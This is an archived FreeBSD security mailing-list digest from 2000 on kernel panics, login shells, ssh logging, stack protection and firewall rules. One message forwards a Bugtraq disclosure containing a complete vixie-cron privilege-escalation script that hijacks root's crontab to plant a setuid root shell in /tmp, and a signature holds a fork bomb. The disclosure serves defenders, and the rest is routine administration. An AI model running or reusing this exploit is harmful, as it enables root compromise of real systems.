Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="FCuugMFkClbJLl1L"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <002201c05055$e3091780$080419ac@teknologi>; from tekman@stikom.edu on Fri, Nov 17, 2000 at 12:18:53PM +0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, Nov 17, 2000 at 12:18:53PM +0700, Tekman wrote:
>
> I was compile my kernel, and i reboot my FreeBSD. And i find kernel panic:
> CPU Not Configure.
>
> My Computer is Intel Pentium 75 MHz, Ram 16 MByte. I tru to make my komputer
> ipfirewall for studing.
>
>
> What's wrong with my kernel ?

You misconfigured it. This isn't a security issue.
Kris

From owner-freebsd-security Thu Nov 16 22:37:11 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 818B537B479; Thu, 16 Nov 2000 22:37:09 -0800 (PST)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 16 Nov 2000 22:35:25 -0800
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAH6aAq17791; Thu, 16 Nov 2000 22:36:11 -0800 (PST) (envelope-from cjc)
Date: Thu, 16 Nov 2000 22:36:00 -0800
From: "Crist J . Clark"
To: Rossen Raykov
Cc: kris@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall)
Message-ID: <20001116223600.B9740@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References: <003f01c04f3e$3c77e170$4c00000a@sage> <20001115125148.A21232@citusc17.usc.edu> <20001115131226.A21677@citusc17.usc.edu> <00d301c04f4d$e9802760$4c00000a@sage> <20001115135331.A22524@citusc17.usc.edu> <010701c04f51$8d2659e0$4c00000a@sage>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: <010701c04f51$8d2659e0$4c00000a@sage>; from rraykov@sageian.com on Wed, Nov 15, 2000 at 05:15:24PM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, Nov 15, 2000 at 05:15:24PM -0500, Rossen Raykov wrote:
> Initially the /etc/shells file contains an empty line (between the comments
> and the first shell).
> I thought that this is the reason why login is granted to a person without
> a shell in /etc/passwd.
> But I was wrong!
> I removed this line from /etc/shells and even after that I was able to gain
> a root command prompt after a valid password.
> The shell is /bin/sh
>
> Doesn't this violate the idea of /etc/shells?

No. A blank entry in /etc/passwd (/etc/master.passwd actually) is assumed to mean /bin/sh. From passwd(5),

  The shell field is the command interpreter the user prefers. If there
  is nothing in the shell field, the Bourne shell (/bin/sh) is assumed.

This is more of a -questions thread.

-- 
Crist J.
Clark
cjclark@alum.mit.edu

From owner-freebsd-security Thu Nov 16 22:52:37 2000
Delivered-To: freebsd-security@freebsd.org
Received: from mailhost01.reflexnet.net (mailhost01.reflexnet.net [64.6.192.82]) by hub.freebsd.org (Postfix) with ESMTP id 443B137B4C5 for ; Thu, 16 Nov 2000 22:52:34 -0800 (PST)
Received: from 149.211.6.64.reflexcom.com ([64.6.211.149]) by mailhost01.reflexnet.net with Microsoft SMTPSVC(5.5.1877.197.19); Thu, 16 Nov 2000 22:50:59 -0800
Received: (from cjc@localhost) by 149.211.6.64.reflexcom.com (8.11.0/8.11.0) id eAH6pKx17890; Thu, 16 Nov 2000 22:51:20 -0800 (PST) (envelope-from cjc)
Date: Thu, 16 Nov 2000 22:51:10 -0800
From: "Crist J . Clark"
To: Trevor Johnson
Cc: Will Mitayai Keeso Rowe, security@FreeBSD.ORG
Subject: Re: Shell acces with not specified shell in /etc/shells (Re: problem using sysinstall)
Message-ID: <20001116225110.C9740@149.211.6.64.reflexcom.com>
Reply-To: cjclark@alum.mit.edu
References:
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 1.0i
In-Reply-To: ; from trevor@jpj.net on Thu, Nov 16, 2000 at 04:57:37AM -0500
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, Nov 16, 2000 at 04:57:37AM -0500, Trevor Johnson wrote:
> > does ssh check /etc/shells ?
>
> Users can run arbitrary commands with ssh, without a shell ever being
> invoked or (at least on my 4.1.1-RELEASE system) anything being
> logged. Try this:
>
> ssh localhost ls
> last | head

Yes and no. A shell is invoked. There will be no login entry in utmp(5) which is what last(1) reads.

  $ ssh localhost "sleep 30"

While that is running,

  $ ps jxa | grep -e sleep -e ssh
  root   243     1   243 b33640 0 Is ?? 0:45.10 /usr/sbin/sshd
  root 17824   243   243 b33640 0 I  ?? 0:00.07 sshd: cjc@notty (sshd)
  cjc  17825 17824 17825 d63f80 0 Is ?? 0:00.02 tcsh -c sleep 30
  cjc  17826 17825 17825 d63f80 0 I  ?? 0:00.00 sleep 30

And you just need to enable the logging (nothing in the default syslog.conf will catch it). You can also change the logging in sshd_config. I have,

  auth.info        /var/log/authlog

in syslog.conf. When I did the above,

  Nov 16 22:47:03 149 sshd[17824]: Accepted password for cjc from 127.0.0.1 port 946

showed up in /var/log/authlog.

-- 
Crist J.
Clark
cjclark@alum.mit.edu

From owner-freebsd-security Fri Nov 17 00:35:08 2000
Delivered-To: freebsd-security@freebsd.org
Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id EA01337B479 for ; Fri, 17 Nov 2000 00:34:56 -0800 (PST)
Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id JAA02617; Fri, 17 Nov 2000 09:34:49 +0100 (MET)
Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 13wgyu-0004VM-00 for ; Fri, 17 Nov 2000 09:34:48 +0100
Date: Fri, 17 Nov 2000 09:34:48 +0100
From: Szilveszter Adam
To: freebsd-security@freebsd.org
Subject: [lcamtuf@TPI.PL: vixie cron...]
Message-ID: <20001117093448.B17216@petra.hos.u-szeged.hu>
Mail-Followup-To: Szilveszter Adam, freebsd-security@freebsd.org
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hello everybody!

For some change, this time a security-related post. Although it seems we are not vulnerable by default, Vixie Cron probably needs fixing. Comments?

Regards:

Szilveszter ADAM

----- Forwarded message from Michal Zalewski -----

Date: Fri, 17 Nov 2000 05:41:32 +0100
Sender: Bugtraq List
From: Michal Zalewski
Subject: vixie cron...
To: BUGTRAQ@SECURITYFOCUS.COM

Attached shell-script exploits fopen() + preserved umask vulnerability in Paul Vixie's cron code. It will work on systems where /var/spool/cron is user-readable (eg. 0755) - AFAIR Debian does so. RedHat (at least 6.1 and previous) has mode 0700 on /var/spool/cron, and thus it isn't exploitable in its default configuration... (ahmm, but this does NOT mean it is a problem of o+rx bits, but of insecure umask() and fopen() calls). I have no information about other distributions or systems - this exploit should automagically detect if you are vulnerable or not (checking /var/spool/cron, looking for Paul Vixie's crontab, etc). Please report your findings to me and/or to BUGTRAQ.

If any of your users launched this exploit on screen, and then any other user (including superuser) invoked "crontab -e" to change his/her crontab entries, privilege elevation will occur. The main attack is performed while root (or any other user, but this particular exploit is configured against root - feel free to change it) is editing his crontab entry. After any modification, when crontabs are updated, this exploit will try to insert evil code over the original contents of the crontab file (probability of successful exploitation is near to 100%). This, after approximately one minute, leads to account compromise.

At the beginning, this exploit is trying to abuse the crontab utility in order to create a somewhat enormous number of world-writable temporary files (these files are opened with fopen(), and then rename()d to the destination name - ugh!). It might take some time and cause less or more heavy load on ancient boxes. After finishing it, the exploit is waiting, consuming little or no system resources, till a "crontab -e" session appears. For more details, see exploit code.
Vendors were not notified because I have no idea which systems and distros are shipping vulnerable configuration, and because pretty good workaround is simple: chmod 700 /var/spool/cron. _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= #!/bin/sh echo '.-------------------------------------------------------------------------.' echo '| Marchew Hyperreal Industries ................... |' echo "| ( ...well, it is just me, but it is more elite to speak as a group... ) |" echo "\`--------------------------------- presents ------------------------------'" echo echo ' * another vixie-cron root sploit by Michal Zalewski * ' echo echo '.-------------------------------------------------------------------------.' echo '| This time, it is somewhat more complicated. On some systems, it might |' echo '| require some tuning, to be slower, but resources-effective. It expects |' echo '| root (or other choosen user) to do "crontab -e" or "crontab /any/file" |' echo '| sooner or later, and spoofs the legitimate cron entry file with evil |' echo '| content, thus leading to account compromise (usually: root compromise). |' echo "\`-------------------------------------------------------------------------'" echo CYCLES=32768 DESTUSER=root SHOULDTOOK=60 VCRON="`strings /usr/bin/crontab 2>/dev/null|grep -i vixie`" if [ "$VCRON" = "" ]; then echo "[-] Sorry, this box is not running vixie cron." echo exit 1 else echo "[+] Found Paul Vixie's /usr/bin/crontab utility." fi if [ -r /var/spool/cron ]; then echo "[+] This box has exploitable /var/spool/cron..." else echo "[-] Sorry, this box is not vulnerable to this attack." echo exit 1 fi if [ -u /usr/bin/crontab ]; then echo "[+] This box has setuid crontab utility..." else echo "[-] Sorry, this box has no setuid crontab." 
echo exit 1 fi cat >dowrite.c <<_EOF_ main() { lseek(1,0,0); write(1,"* * * * * /tmp/.rootcron\n\n",26); ftruncate(1,25); } _EOF_ echo "[+] Compiling helper application #1..." gcc -o dowrite dowrite.c if [ ! -f dowrite ]; then echo "[-] Compilation failed." echo exit 1 fi echo "[+] Application #1 compiled successfully." echo "[+] Creating helper application #2..." cat >/tmp/.rootcron <<_EOF_ #!/bin/sh ( chown root.root /tmp/.r00tcr0n chmod 6755 /tmp/.r00tcr0n rm -f /var/spool/cron/tmp.* crontab -r ) &>/dev/null _EOF_ cat >root.c <<_EOF_ main() { setuid(0); setgid(0); unlink("/tmp/.r00tcr0n"); execl("/bin/bash","bash","-i",0); perror("bash"); } _EOF_ echo "[+] Compiling helper application #3..." gcc -o /tmp/.r00tcr0n root.c if [ ! -f /tmp/.r00tcr0n ]; then echo "[-] Compilation failed." echo exit 1 fi echo "[+] Application #3 compiled successfully." X=0 if [ ! "$1" = "noprep" ]; then echo "[*] Attack against user $DESTUSER, doing $CYCLES setup cycles..." echo " Please be patient, setup might took some time; to skip it if" echo " /var/spool/cron on this machine is already initialized, use" echo " '$0 noprep'." PROB=$[CYCLES*100/32768] test "$PROB" -gt "100" && PROB=100 echo "[+] This gives almost $PROB% probability of success on the first attempt." while [ "$X" -lt "$CYCLES" ]; do X=$[X+1] echo -ne "\r[?] Doing cycle $X of $CYCLES [$[X*100/CYCLES]% done]... " umask 0 ( ( crontab /dev/urandom & usleep 1000; killall crontab ) & ) &>/dev/null done sleep 3;killall -9 crontab &>/dev/null echo echo "[+] Setup complete, /var/spool/cron filled with junk tmp files." CNT=0 echo "[*] Now, doing cleanup and counting the nodes..." for i in 1 2 3 4 5 6 7 8 9; do for j in /var/spool/cron/tmp.${i}*; do echo -n >$j echo -ne "\r[+] Node $CNT clean... " CNT=$[CNT+1] done done echo PROB=$[CNT*100/32768] echo "[+] Found $CNT nodes, approx. $PROB% chance..." if [ "$CNT" -lt "$[CYCLES*2/3]" ]; then echo "[-] Less than 66% of expected nodes were created. Try adjusting the exploit." 
echo exit 1 fi else echo "[?] Skipping /var/spool/cron initialization. Results might be unpredictable." fi echo "[+] Now I will wait for $DESTUSER to edit his crontab. Could take some time." chmod 755 /tmp/.rootcron while :; do sleep 1 GOT="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep|cut -b10-15|head -1`" test "$GOT" = "" && continue GOT=`echo $GOT` echo "[+] Caught victim at pid $GOT..." if [ ! -f /var/spool/cron/tmp.$GOT ]; then echo "[-] DAMN! We have no node for this pid, bad luck..." continue fi echo '[+] Got this node :) Entering event wait loop...' export DESTUSER ( G=blabla while [ ! "$G" = "" ]; do G="`ps auxhw|grep ^$DESTUSER|grep crontab|grep -v grep`" done sleep 1 echo "[+] Bingo! It happened. Now writing our evil content..." 1>&2 ./dowrite ) >/var/spool/cron/tmp.$GOT echo '* * * * * /bin/true' >.ctab echo "[+] Evil content written. Trying to rehash the daemon..." crontab .ctab crontab -r echo "[+] Entering event loop waiting for exploit to work..." while [ ! -u /tmp/.r00tcr0n ]; do sleep 1 done rm -f .ctab dowrite dowrite.c /tmp/.rootcron root.c echo "[+] Calling the main code..." /tmp/.r00tcr0n echo "[*] Thank you for choosing Marchew Industries." 
echo exit 1 done ----- End forwarded message ----- -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 3:23:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from lists01.iafrica.com (lists01.iafrica.com [196.7.0.141]) by hub.freebsd.org (Postfix) with ESMTP id 947E537B479 for ; Fri, 17 Nov 2000 03:23:51 -0800 (PST) Received: from nwl.fw.uunet.co.za ([196.31.2.162]) by lists01.iafrica.com with esmtp (Exim 3.12 #2) id 13wjcF-0006P3-00; Fri, 17 Nov 2000 13:23:35 +0200 Received: (from nobody@localhost) by nwl.fw.uunet.co.za (8.8.8/8.6.9) id NAA24573; Fri, 17 Nov 2000 13:23:43 +0200 (SAST) Received: by nwl.fw.uunet.co.za via recvmail id 24304; Fri Nov 17 13:22:12 2000 Received: from sheldonh (helo=axl.fw.uunet.co.za) by axl.fw.uunet.co.za with local-esmtp (Exim 3.16 #1) id 13wjat-0000ao-00; Fri, 17 Nov 2000 13:22:11 +0200 
From: Sheldon Hearn
To: Marcin Krasowski
Cc: Sheldon Jones, freebsd-security@freebsd.org
Subject: Re: chroot and ftpd
In-reply-to: Your message of "Fri, 17 Nov 2000 06:29:28 +0100." <3A14C238.19C7C60C@weblab.pl>
Date: Fri, 17 Nov 2000 13:22:11 +0200
Message-ID: <2281.974460131@axl.fw.uunet.co.za>
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 17 Nov 2000 06:29:28 +0100, Marcin Krasowski wrote:

> > Does anyone know of a way to have the chroot function in ftpd lock a
> > user into a sub-directory under their user directory. I would like a
> > way to keep the users in a sub-directory under their root dir.
>
> Just put the name of the user into the /etc/ftpchroot file (create it if
> You dont have one).

You may have missed the key part of Sheldon's mail that mentioned a "sub-directory". The stock ftp daemon shipped with FreeBSD does not have this facility.

It wouldn't be at all difficult to extend the structure of the ftpchroot file to support this in a backward compatible manner. I wouldn't feel comfortable doing this, because I'm not convinced that the ftpchroot file is exclusively owned by and relevant to the ftp daemon.

I can understand that this is a desirable feature, but I'm it's probably worth further discussion off this list, where the topic is off-charter. For example, it might be preferable to introduce a ~/ftpdrc file, the contents of which are executed under the user's userid during the FTP login.

I'd suggest that interested parties follow up to me personally (_not_ to this list) and I'll post a digest back to the freebsd-current mailing list.

Ciao,
Sheldon.
From owner-freebsd-security Fri Nov 17 04:27:10 2000
Delivered-To: freebsd-security@freebsd.org
Received: from cube.gelatinous.com (cube.gelatinous.com [207.82.194.150]) by hub.freebsd.org (Postfix) with SMTP id E2D5337B4C5 for ; Fri, 17 Nov 2000 04:27:08 -0800 (PST)
Received: (qmail 54415 invoked by uid 1000); 17 Nov 2000 12:27:08 -0000
Date: Fri, 17 Nov 2000 04:27:08 -0800
From: Aaron Smith
To: Kris Kennaway
Cc: Garrett Wollman, freebsd-security@FreeBSD.ORG
Subject: Re: Is it possible to configure a FreeBSD VPN server to talk to Windows/Linux/BSD clients
Message-ID: <20001117042708.C36817@gelatinous.com>
References: <200009231952.PAA32269@khavrinen.lcs.mit.edu>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from kris@FreeBSD.org on Sat, Sep 23, 2000 at 02:01:24PM -0700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

i wrote up a howto for the method i am using to tunnel several masqueraded networks using freebsd ipsec. it's not interoperability related, but i had to dig quite a bit to find and piece together non-japanese information, so i wanted to add to the pool. hopefully someone will find it helpful. let me know if you have comments.

http://www.mutex.org/aaron/tips/ipsec

aaron

On Sat, Sep 23, 2000 at 02:01:24PM -0700, Kris Kennaway wrote:
> On Sat, 23 Sep 2000, Garrett Wollman wrote:
>
> > < said:
> >
> > > Linux (among others) - see www.kame.net and the docs included in the port
> > > distfile for more information. General information on ipsec can be found
> >
> > The racoon documentation is almost totally unintelligible, especially
> > for new users. Perhaps the Japanese documentation is better, but most
> > FreeBSD users outside of Japan don't understand Japanese. I ended up
> > reading the parser source code and still wasn't sufficiently
> > enlightened.
>
> Yeah, it's a problem. I've had one offer from someone who's figured it out
> on her own including interoperability, but havent got anything from her
> yet. I'll bug her until I get something :-)
>
> Kris
>
> --
> In God we Trust -- all others must submit an X.509 certificate.
> -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 8:29:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from epicsol.org (epicsol.org [209.100.173.7]) by hub.freebsd.org (Postfix) with ESMTP id AAB4437B479 for ; Fri, 17 Nov 2000 08:29:54 -0800 (PST) Received: (from jnelson@localhost) by epicsol.org (8.9.3/8.9.3) id KAA61562; Fri, 17 Nov 2000 10:29:50 -0600 (CST) (envelope-from jnelson) Date: Fri, 17 Nov 2000 10:29:50 -0600 (CST) From: Jeremy Nelson Message-Id: <200011171629.KAA61562@epicsol.org> To: freebsd-security@freebsd.org Subject: Re: FYI: Propolice for gcc-2.95.2 In-Reply-To: Organization: Damage, org. Cc: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In article you posted: >At ftp://dse.doc.ic.ac.uk/pub/misc/bcc/ there is another set of patches >that add bounds-checking to GCC, but unfortunately the newest is for GCC >2.7.2. The current maintainer's home page is at: http://web.inter.nl.net/hcc/Haj.Ten.Brugge/ And there are versions of bounds checking gcc up through 2.95.2. (It is an excellent debugging tool, i use it extensively.) Jeremy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Nov 17 14:37:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from pt-quorum.com (pt-quorum.com [209.10.167.210]) by hub.freebsd.org (Postfix) with ESMTP id 3165237B4C5 for ; Fri, 17 Nov 2000 14:37:52 -0800 (PST) Received: from n2 (d128175.lsb.PT.EU.net [193.126.128.175]) by pt-quorum.com (8.9.3/8.9.3) with SMTP id WAA24182 for ; Fri, 17 Nov 2000 22:32:31 GMT Message-ID: <00bd01c050e7$6f68f1f0$0200a8c0@n2> 
From: "Nuno Teixeira"
To: freebsd-security@FreeBSD.ORG
Subject: Restarting Firewall ruleset
Date: Fri, 17 Nov 2000 22:40:23 -0000

Hello to all,

Finally I configured a ppp firewall for my FreeBSD gateway. It is working
without any problems.

My question is: how to restart the firewall. I'm asking this, because I want to
make a lot of tests with it (opening / closing services, etc) and I don't
know how to restart it without rebooting the gateway machine.

Thanks very much,

Nuno Teixeira

From owner-freebsd-security Fri Nov 17 15:03:49 2000
From: "Andreas Alderud"
To: freebsd-security@FreeBSD.ORG
Subject: Re: FYI: Propolice for gcc-2.95.2
Date: Sat, 18 Nov 2000 00:03:50 +0100

Mike Silbersack wrote:
>MAC and stack-smashing protection are certainly not mutually
>exclusive. Even if the base system is configured with strong access
>barriers to compromised programs, there is still lesser mischief
>that can be performed.

Hardly needed, look at VMS for example, what is needed is more layers, not
just user and god (i.e. root). Besides, getting past the stack guards in
programs isn't much harder than writing an ordinary exploit, though a bit
different.

>Additionally, it's very likely that people will still install wu-ftpd,
>qpopper, imapd, etc from ports. None of trustedbsd's features will help
>when confronted with the default behavior of these programs. Stack
>protection, on the other hand, would have prevented a good amount of the
>past bugs in these programs, and will likely continue to be a good
>protection method.

Good for debugging, but an exploit is quite more than just an ordinary
overflow. I welcome it as a developer debugging feature in 5.x, and as a
security hardening feature in 4.x.

/Kind regards, David A. Alderud

From owner-freebsd-security Fri Nov 17 15:06:43 2000
From: "Andreas Alderud"
To: freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Sat, 18 Nov 2000 00:06:43 +0100

Nuno Teixeira wrote:
>My question is: how to restart the firewall.

ipfw -f flush

with it you can supply the rule number. man ipfw ;-)

/Kind regards, David A. Alderud

From owner-freebsd-security Fri Nov 17 15:24:07 2000
From: Travis {RapidSupport}
To: Nuno Teixeira
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Fri, 17 Nov 2000 16:23:44 -0700 (MST)

On Fri, 17 Nov 2000, Nuno Teixeira wrote:

> Finally I configured a ppp firewall for my FreeBSD gateway. It is working
> without any problems.
>
> My question is: how to restart the firewall. I'm asking this, because I want to
> make a lot of tests with it (opening / closing services, etc) and I don't
> know how to restart it without rebooting the gateway machine.

If you are running ipfw you will need to flush then reload:

ipfw flush [y]
ipfw /etc/firewalls/blah

...where "blah" is the firewall...

If you are running ipf then:

ipf -F a && ipf -f /etc/firewalls/ipf.blah

...where "ipf.blah" is the firewall...

Travis

/* -=[ Travis Ogden ]-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
   RapidNet Admin Team
   Mail: traviso@RapidNet.com   Web: www.RapidNet.com/~traviso
   -=-=-=-=-=-=-=-=-=-=-=-=-=-[ traviso@rapidnet.com ]=-=-=-=-= */

From owner-freebsd-security Fri Nov 17 15:44:48 2000
From: Kris Kennaway
To: KOJIMA Hajime
Cc: security@FreeBSD.ORG
Subject: Base system gcc patch (Re: FYI: Propolice for gcc-2.95.2)
Date: Fri, 17 Nov 2000 15:45:51 -0800

This was trivial to get working on FreeBSD, but here is a patch against the
system gcc in 4.x which will compile a ProPolice-enabled version, so FreeBSD
users can start easily making use of this. The patch is the same for 5.x users
except you will need to replace "contrib/gcc" with "contrib/gcc.295" in the
diff.

http://www.freebsd.org/~kris/protector.patch

Once you have done a buildworld and installed the new compiler, you can start
playing with adding "-fstack-protector" into CFLAGS and e.g. build a new world.
I haven't actually tested the results of this yet, so don't do that on your
production systems yet ;-)

It does seem to work, however:

mollari# /tmp/smash AAAAAAAAAAAAAAAAAAAAAAAAAA
main: stack smashing attack?
Segmentation fault (core dumped)

(gdb) bt
#0  0x8048726 in __stack_smash_handler ()
#1  0x8048665 in main ()
#2  0x41414141 in ?? ()
Cannot access memory at address 0x41414141.

:-)

The one suggestion I have at this stage is to make _stack_smash_handler
syslog() the error so there is a system record of the potential attack. There
may be a reason that isn't feasible, however.

Nice work!

Kris

On Thu, Nov 16, 2000 at 11:52:38AM +0900, KOJIMA Hajime wrote:
> FYI: "Propolice", GCC extension for protecting applications from
> stack-smashing attacks, for gcc-2.95.2 is now available.
>
>
> ----
> KOJIMA Hajime - Ryukoku University, Seta, Ootsu, Shiga, 520-2194 Japan
> [Office] kjm@rins.ryukoku.ac.jp, http://www.st.ryukoku.ac.jp/~kjm/

From owner-freebsd-security Fri Nov 17 16:36:36 2000
From: Darren Reed
To: traviso@RapidNet.com (Travis {RapidSupport})
Cc: nuno.teixeira@pt-quorum.com (Nuno Teixeira), freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Sat, 18 Nov 2000 11:35:57 +1100 (Australia/ACT)

In some mail from Travis {RapidSupport}, sie said:
>
> If you are running ipf then:
>
> ipf -F a && ipf -f /etc/firewalls/ipf.blah

No, you should do:

ipf -If /etc/firewalls/ipf.blah && ipf -s -IF a

load rules into alternative set, if successful then switch active sets and
flush the old rules. Doing this means there is no gap in which a partial
ruleset is loaded and active.

Darren

From owner-freebsd-security Fri Nov 17 16:36:41 2000
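Added example, not from the thread and not IPFilter's own code: a POSIX sh wrapper around the two-step reload Darren describes, with the failure path handled. `ipf -If` parses the file into the inactive set while the active set keeps filtering; only if every rule loaded does `ipf -s -IF a` swap the sets and flush the previous rules. If the file is rejected, the function flushes whatever partial set landed in the inactive slot, so a later swap cannot activate a half-loaded ruleset, and returns non-zero. The `IPF` variable is this example's assumption, there so the function can be exercised against a stub instead of a live firewall. Note that ipfw on 4.x has no inactive set to swap into: `ipfw flush` leaves only the default rule 65535, which denies unless the kernel was built with IPFIREWALL_DEFAULT_TO_ACCEPT, so the flush and the reload belong in one script run from the console, not typed step by step over an ssh session to the gateway.

```shell
#!/bin/sh
# Added example (not IPFilter's code): atomic IPFilter ruleset reload.
# IPF names the ipf(8) binary; it is a hook (an assumption of this example)
# so the function can be run against a stub in tests.
: "${IPF:=ipf}"

# reload_ipf_rules RULEFILE
#   1. parse RULEFILE into the inactive set (-I); the active set keeps
#      filtering untouched while this happens;
#   2. only if every rule loaded, swap the sets (-s) and flush the rules
#      that are now inactive (-IF a), i.e. the previous ruleset;
#   3. if the load failed, flush whatever partial set landed in the inactive
#      slot so that a later swap cannot activate a half-loaded ruleset.
# Returns 0 on a completed swap, 1 if the file was unreadable or rejected.
reload_ipf_rules() {
    rulefile=$1
    if [ ! -r "$rulefile" ]; then
        echo "reload_ipf_rules: cannot read $rulefile" >&2
        return 1
    fi
    if "$IPF" -If "$rulefile"; then
        "$IPF" -s -IF a
    else
        echo "reload_ipf_rules: $rulefile rejected; active ruleset left unchanged" >&2
        "$IPF" -IF a
        return 1
    fi
}

# Usage (root, kernel with IPFilter): source this file, then
#   reload_ipf_rules /etc/ipf.rules
```

The exit status is what a cron job or rc script should branch on: a non-zero return means the old ruleset is still the one filtering, which is the safe outcome for a gateway.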
From: Peter Chiu
To: "Nuno Teixeira"
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Restarting Firewall ruleset
Date: Fri, 17 Nov 2000 19:36:32 -0500

Hello Nuno,

I use

sh /etc/rc.firewall /etc/rc.firewall.myrules

rc.firewall.myrules is the file that stores all the rules.

Friday, November 17, 2000, 5:40:23 PM, you wrote:

NT> Hello to all,

NT> Finally I configured a ppp firewall for my FreeBSD gateway. It is working
NT> without any problems.

NT> My question is: how to restart the firewall. I'm asking this, because I want to
NT> make a lot of tests with it (opening / closing services, etc) and I don't
NT> know how to restart it without rebooting the gateway machine.

NT> Thanks very much,

NT> Nuno Teixeira

--
Peter
EMail: mailto:webbie(at)ipfw(dot)org
PGP Key: http://www.ipfw.org/pgpkey.txt
PGP Fingerprint: 0B9F E081 35CD B9AF 58EA 7E43 38EC C84F 4AB4 792C

From owner-freebsd-security Fri Nov 17 16:41:46 2000
From: Buliwyf McGraw
To: security@FreeBSD.ORG
Subject: Napster Port
Date: Fri, 17 Nov 2000 19:49:54 -0500 (COT)

Hi to everyone!

This is my question:

- I want to deny all access to Napster from my subnet. I'm using ip filter...
  but I don't know what is the port that I need to block...

Any suggestion about the right rule in my gateway???

Thanks...

Buliwyf McGraw
Administrator, Libertad server
Information Services Centre
Universidad del Valle

From owner-freebsd-security Fri Nov 17 17:22:51 2000
From: Nate Williams
To: Buliwyf McGraw
Cc: security@FreeBSD.ORG
Subject: Re: Napster Port
Date: Fri, 17 Nov 2000 18:22:45 -0700 (MST)

> Hi to everyone!
> This is my question:
> - I want to deny all access to Napster from my subnet. I'm using ip
> filter... but I don't know what is the port that I need to block...
> Any suggestion about the right rule in my gateway???

This is the best I've got so far...

# Disable Napster
/sbin/ipfw add 600 deny log tcp from any to 208.178.163.56/29 via ${netif}
/sbin/ipfw add 610 deny log tcp from any to 208.178.175.128/29 via ${netif}
/sbin/ipfw add 620 deny log tcp from any to 208.49.239.240/28 via ${netif}
/sbin/ipfw add 630 deny log tcp from any to 208.49.228.0/24 via ${netif}
/sbin/ipfw add 640 deny log tcp from any to 208.184.216.0/24 via ${netif}
/sbin/ipfw add 650 deny log tcp from any to 64.124.41.0/24 via ${netif}
/sbin/ipfw add 660 deny log tcp from any 8888 to any via ${netif}

{where 'netif' is the network interface for the internet}

Nate

From owner-freebsd-security Fri Nov 17 17:26:45 2000
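Because Nate's rules use `deny log`, every match is reported by the kernel through syslog, which gives the detection side of the same control: which inside hosts keep trying, and against which rule. Added example, not from the thread: a POSIX sh function (awk underneath) that summarizes such entries per rule and source host, together with a constructed sample log in the classic 4.x ipfw message layout (`ipfw: <rule> <action> <proto> <src>:<port> <dst>:<port> <in|out> via <ifname>`). The hostname, addresses, times and the unrelated sshd line in the sample are made up for the example; Accept entries and non-ipfw lines are skipped.

```shell
#!/bin/sh
# Added example (not from the thread): summarize ipfw "deny log" hits.

# write_sample_log FILE
#   Writes a constructed syslog excerpt in the classic 4.x ipfw layout:
#   "ipfw: <rule> <action> <proto> <src>:<port> <dst>:<port> <in|out> via <if>".
#   Host, addresses and times are made up for the example.
write_sample_log() {
    cat > "$1" <<'EOF'
Nov 17 18:30:01 gw /kernel: ipfw: 600 Deny TCP 192.168.1.10:1029 208.178.163.56:8888 out via tun0
Nov 17 18:30:02 gw /kernel: ipfw: 600 Deny TCP 192.168.1.10:1030 208.178.163.57:8888 out via tun0
Nov 17 18:30:05 gw /kernel: ipfw: 660 Deny TCP 64.124.41.17:8888 192.168.1.22:1101 in via tun0
Nov 17 18:30:09 gw /kernel: ipfw: 650 Deny TCP 192.168.1.22:1102 64.124.41.17:8888 out via tun0
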